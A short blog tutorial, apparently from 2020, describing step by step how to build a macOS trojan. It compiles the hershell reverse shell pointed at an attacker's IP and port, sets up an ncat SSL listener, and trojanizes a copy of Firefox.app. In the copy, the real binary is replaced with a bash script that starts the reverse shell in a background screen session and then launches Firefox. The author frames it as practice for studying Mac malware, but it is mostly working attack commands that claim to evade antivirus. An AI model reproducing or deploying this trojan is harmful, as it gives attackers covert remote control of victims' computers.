Building a MacOS Trojan

This article will outline a simple method I used for building and deploying malware on MacOS. I wanted to do this to prepare for reading Patrick Wardle’s book The Art of Mac Malware.

Setting up the Reverse Shell:

A simple reverse shell will serve as the base malicious payload that will be executed on the victim machine. I like this method because it is extremely simple and should evade antivirus.

I’m going to use hershell, a very simple, cross-platform reverse shell client written in Go. I’ll compile the client and server on an Arch Linux machine.

Setup Hershell:

pacman -Sy --noconfirm go

Since I don’t need the go environment to persist on my server, let’s set the GOPATH variable to /tmp/go and grab hershell:

export GOPATH=/tmp/go
go get github.com/lesnuages/hershell
go get github.com/lesnuages/hershell/shell

Compile Hershell for MacOS Victim:

Now prepare and compile hershell for the MacOS victim (change the LHOST and LPORT variables to your attacking machine/server):

cd /tmp/go/src/github.com/lesnuages/hershell/
make depends

make macos64 LHOST=192.168.1.50 LPORT=5000

The MacOS binary for the victim machine should now be available at /tmp/go/src/github.com/lesnuages/hershell/hershell:

❯ file /tmp/go/src/github.com/lesnuages/hershell/hershell
/tmp/go/src/github.com/lesnuages/hershell/hershell: Mach-O 64-bit x86_64 executable

Setup the Malicious Listener on Server:

Generate the server certificate for hershell and install nmap so that we can use ncat as the listener on the attacking server:

cd /tmp/go/src/github.com/lesnuages/hershell/
make depends

pacman -Sy --noconfirm nmap

Then run the listener on the attacking machine:

ncat --ssl --ssl-cert /tmp/go/src/github.com/lesnuages/hershell/server.pem --ssl-key /tmp/go/src/github.com/lesnuages/hershell/server.key -lvp 5000

This is what it looks like when a session is established:

❯ ncat --ssl --ssl-cert /tmp/go/src/github.com/lesnuages/hershell/server.pem --ssl-key /tmp/go/src/github.com/lesnuages/hershell/server.key -lvp 5000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on 0.0.0.0:5000
Ncat: Connection from 192.168.1.2.
Ncat: Connection from 192.168.1.2:52866.
[hershell]> whoami
heywoodlh
[hershell]> echo $HOSTNAME
unix-machine

Trojanize an Application:

I’m going to trojanize Firefox since I use Firefox a ton. This method is super simplistic, but it gets the job done. And most likely, it wouldn’t be detected unless a user was vigilant.

I’m going to perform the following commands on a Mac with Firefox already installed. You could replace Firefox with another application if you wanted to.

Copy Firefox.app:

cp -r /Applications/Firefox.app /tmp/Firefox-trojan.app

Place the hershell binary that you created on the attacking server in /tmp/Firefox-trojan.app/Contents/MacOS.

Rename the original Firefox binary file:

cd /tmp/Firefox-trojan.app/Contents/MacOS
mv firefox firefox.orig

Now create a shell script in place of the firefox binary that will run hershell and then will run the original firefox binary:

touch firefox
chmod +x firefox

Then add the following content to the new firefox file:

#!/usr/bin/env bash

full_path=$(dirname $(realpath $0))

/usr/bin/screen -dmS reverse-shell ${full_path}/hershell

${full_path}/firefox-bin

This method will use the screen command to run hershell in the background with a session name of reverse-shell. This method is not discrete at all, but I don’t really care in this case.

Profit:

When the Firefox-trojan.app is opened, it should attempt to create a reverse shell with the attacking server that is listening for a connection.

alt text

Written on December 19, 2020